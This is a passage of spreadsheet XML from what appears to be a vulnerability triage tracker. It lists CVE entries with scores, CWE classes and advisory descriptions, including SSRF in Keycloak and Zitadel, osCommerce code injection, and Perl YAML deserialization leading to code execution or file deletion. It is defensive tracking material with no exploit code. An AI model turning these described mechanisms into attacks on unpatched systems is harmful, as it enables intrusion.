          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105226</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-104402</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr"/>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-201</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>Insertion of Sensitive Information Into Sent Data vulnerability in farvisun Mindio Magic MCP mindio-magic-mcp allows Retrieve Embedded Sensitive Data.This issue affects Mindio Magic MCP: from n/a through 0.5.6.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-104402</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105157</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in RainyGao DocSys up to 2.02.85. The affected element is the function DocController.doGetTmp of the file /Doc/doGetTmpFile.do of the component Document Controller. The manipulation of the argument path/fileName leads to path traversal. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105157</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105225</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr"/>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-94</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in osCommerce osCommerce2 up to 2.3.4.1. This affects the function include of the file includes/classes/payment.php of the component Payment Page. Such manipulation of the argument MODULE_PAYMENT_INSTALLED leads to code injection. The attack can be executed remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105225</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105301</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the X.509 client-certificate authenticator of Keycloak, a solution for identity and access management. The issue occurs when the server is configured to check certificate revocation using CRL Distribution Points or OCSP. An attacker can provide a specially crafted certificate that points to a malicious server, causing Keycloak to make unauthorized outbound requests to internal or external endpoints before the certificate is fully validated. This can lead to a blind server-side request forgery (SSRF) attack.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105301</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105156</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr"/>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-326, CWE-916</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in YzmCMS up to 7.6. Impacted is the function Password of the file /common/function/system.func.php of the component MD5 Handler. Executing a manipulation of the argument pass can lead to password hash with insufficient computational effort. The attack may be launched remotely. This attack is characterized by high complexity. The exploitability is considered difficult. The exploit has been made available to the public and could be used for attacks. The vendor kindly explains: "Our regular release cycle is about 6 months. The last release was in the previous month, and our next scheduled version will be released in March 2027. We will implement the backward-compatible gradual hash migration feature in this upcoming release. (...) Before the new version is available, we will publish security mitigation guidance on our official documentation for existing deployers to reduce the risk."</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105156</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105237</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G80" s="5" t="inlineStr"/>
      <c r="H80" s="5" t="inlineStr"/>
      <c r="I80" s="5" t="inlineStr"/>
      <c r="J80" s="5" t="inlineStr"/>
      <c r="K80" s="5" t="inlineStr"/>
      <c r="L80" s="5" t="inlineStr"/>
      <c r="M80" s="5" t="inlineStr"/>
      <c r="N80" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O80" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P80" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q80" s="5" t="inlineStr"/>
      <c r="R80" s="5" t="inlineStr">
        <is>
          <t>CWE-307, CWE-799</t>
        </is>
      </c>
      <c r="S80" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in linlinjava litemall up to 1.8.0. This affects an unknown part of the file litemall-admin-api/src/main/java/org/linlinjava/litemall/admin/web/AdminAuthController.java of the component Login Endpoint. The manipulation results in improper restriction of excessive authentication attempts. The attack may be performed from remote. A high complexity level is associated with this attack. It is indicated that the exploitability is difficult. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105237</t>
        </is>
      </c>
    </row>
    <row r="81">
      <c r="A81" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B81" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C81" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105245</t>
        </is>
      </c>
      <c r="D81" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E81" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G81" s="5" t="inlineStr"/>
      <c r="H81" s="5" t="inlineStr"/>
      <c r="I81" s="5" t="inlineStr"/>
      <c r="J81" s="5" t="inlineStr"/>
      <c r="K81" s="5" t="inlineStr"/>
      <c r="L81" s="5" t="inlineStr"/>
      <c r="M81" s="5" t="inlineStr"/>
      <c r="N81" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O81" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P81" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q81" s="5" t="inlineStr"/>
      <c r="R81" s="5" t="inlineStr">
        <is>
          <t>CWE-310, CWE-319</t>
        </is>
      </c>
      <c r="S81" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in sgl-project sglang up to 0.5.21. This issue affects the function server_info of the file python/sglang/srt/entrypoints/http_server.py of the component HTTP Endpoint. Such manipulation of the argument api_key leads to cleartext transmission of sensitive information. It is possible to launch the attack remotely. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit has been disclosed to the public and may be used. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="T81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105245</t>
        </is>
      </c>
    </row>
    <row r="82">
      <c r="A82" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B82" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C82" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105173</t>
        </is>
      </c>
      <c r="D82" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E82" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G82" s="5" t="inlineStr"/>
      <c r="H82" s="5" t="inlineStr"/>
      <c r="I82" s="5" t="inlineStr"/>
      <c r="J82" s="5" t="inlineStr"/>
      <c r="K82" s="5" t="inlineStr"/>
      <c r="L82" s="5" t="inlineStr"/>
      <c r="M82" s="5" t="inlineStr"/>
      <c r="N82" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O82" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P82" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q82" s="5" t="inlineStr"/>
      <c r="R82" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S82" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in code-projects Human Resource Management 1.0. This affects an unknown part of the file /humanresourcemanagementsystem/src/store/EventStore.php of the component Event Creation. Executing a manipulation of the argument eventSubject can lead to cross site scripting. The attack may be launched remotely. The exploit has been published and may be used.</t>
        </is>
      </c>
      <c r="T82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105173</t>
        </is>
      </c>
    </row>
    <row r="83">
      <c r="A83" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B83" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C83" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105188</t>
        </is>
      </c>
      <c r="D83" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E83" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G83" s="5" t="inlineStr"/>
      <c r="H83" s="5" t="inlineStr"/>
      <c r="I83" s="5" t="inlineStr"/>
      <c r="J83" s="5" t="inlineStr"/>
      <c r="K83" s="5" t="inlineStr"/>
      <c r="L83" s="5" t="inlineStr"/>
      <c r="M83" s="5" t="inlineStr"/>
      <c r="N83" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O83" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P83" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q83" s="5" t="inlineStr"/>
      <c r="R83" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S83" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in code-projects Human Resource Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /views/admin/liveEventHistory.php of the component Live Event History. The manipulation of the argument eventSubject results in cross site scripting. The attack may be launched remotely. The exploit has been made public and could be used.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105188</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105217</t>
        </is>
      </c>
      <c r="D84" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr"/>
      <c r="M84" s="5" t="inlineStr"/>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P84" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>Cockpit CMS 2.12.0 before 2.14.1 disables TLS certificate verification in the cron.php web worker restart request, allowing network attackers to capture the worker token. Man-in-the-middle attackers on the outbound path to site_url can present any certificate to steal the worker/web/token value and start the web worker.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105217</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105164</t>
        </is>
      </c>
      <c r="D85" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr"/>
      <c r="M85" s="5" t="inlineStr"/>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P85" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-125</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in NASA cFS up to 7.0.1. This issue affects the function CFE_FS_ParseInputFileNameEx of the file cfe/modules/fs/fsw/src/cfe_fs_api.c. This manipulation causes out-of-bounds read. Remote exploitation of the attack is possible. The pull request to fix this issue awaits acceptance.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105164</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105179</t>
        </is>
      </c>
      <c r="D86" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr"/>
      <c r="M86" s="5" t="inlineStr"/>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P86" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-310, CWE-311</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in SourceCodester Drug Recommendation System 1.0. This affects an unknown function of the file Admin/add_user.php of the component Password Handler. Executing a manipulation of the argument Password can lead to missing encryption of sensitive data. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks.</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105179</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-105214</t>
        </is>
      </c>
      <c r="D87" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr"/>
      <c r="M87" s="5" t="inlineStr"/>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P87" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>Zitadel before 4.16.2 contains a server-side request forgery vulnerability that allows attackers to make the server request internal resources through organization domain HTTP verification. The challenge fetch uses Go's default http.Get instead of the protected client, so attackers can register domains that redirect to loopback, internal, or cloud metadata addresses to scan ports and map internal networks.</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-105214</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2017-20285</t>
        </is>
      </c>
      <c r="D88" s="5" t="inlineStr"/>
      <c r="E88" s="5" t="inlineStr"/>
      <c r="F88" s="5" t="inlineStr"/>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr"/>
      <c r="M88" s="5" t="inlineStr"/>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P88" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-502</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>YAML versions before 1.30 for Perl allow a loaded document to trigger the DESTROY method of arbitrary classes.
A perl/hash:Class tag blesses a hash into the class it names. The document supplies the object's fields, and Perl calls DESTROY when it goes out of scope.
What DESTROY does depends on the classes the process has loaded. With File::Temp::Dir from core Perl, it can delete a directory tree the document names.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2017-20285</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2019-25777</t>
        </is>
      </c>
      <c r="D89" s="5" t="inlineStr"/>
      <c r="E89" s="5" t="inlineStr"/>
      <c r="F89" s="5" t="inlineStr"/>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr"/>
      <c r="M89" s="5" t="inlineStr"/>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P89" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-914</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>YAML versions before 1.27_001 for Perl allow a loaded perl/glob document to replace any package variable, which can lead to arbitrary code execution.
A perl/glob document names a package and a symbol, and supplies the value assigned to it. Nothing restricts the name, so the target can be @INC or YAML's own load options.
A perl/glob document that sets $YAML::LoadCode or $YAML::UseCode turns on code loading, which is off by default, for every later Load() in the process. A perl/code document is then passed to a string eval, so an attacker who supplies two documents to separate Load() calls in one process can execute arbitrary Perl code.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2019-25777</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13607</t>
        </is>
      </c>
      <c r="D90" s="5" t="inlineStr"/>
      <c r="E90" s="5" t="inlineStr"/>
      <c r="F90" s="5" t="inlineStr"/>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr"/>
      <c r="M90" s="5" t="inlineStr"/>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P90" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr"/>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>The File Uploads Addon for WooCommerce WordPress plugin through 1.7.6 stores customer-uploaded files in a publicly web-accessible uploads directory and the access restriction it generates is ineffective, so an unauthenticated attacker who knows or guesses a file's name can retrieve customer-uploaded files directly, bypassing the File Uploads Addon for WooCommerce WordPress plugin through 1.7.6's authenticated download mechanism.</t>
        </is>
      </c>
      <c r="T90" s="6" t="inlineStr">
        <is>
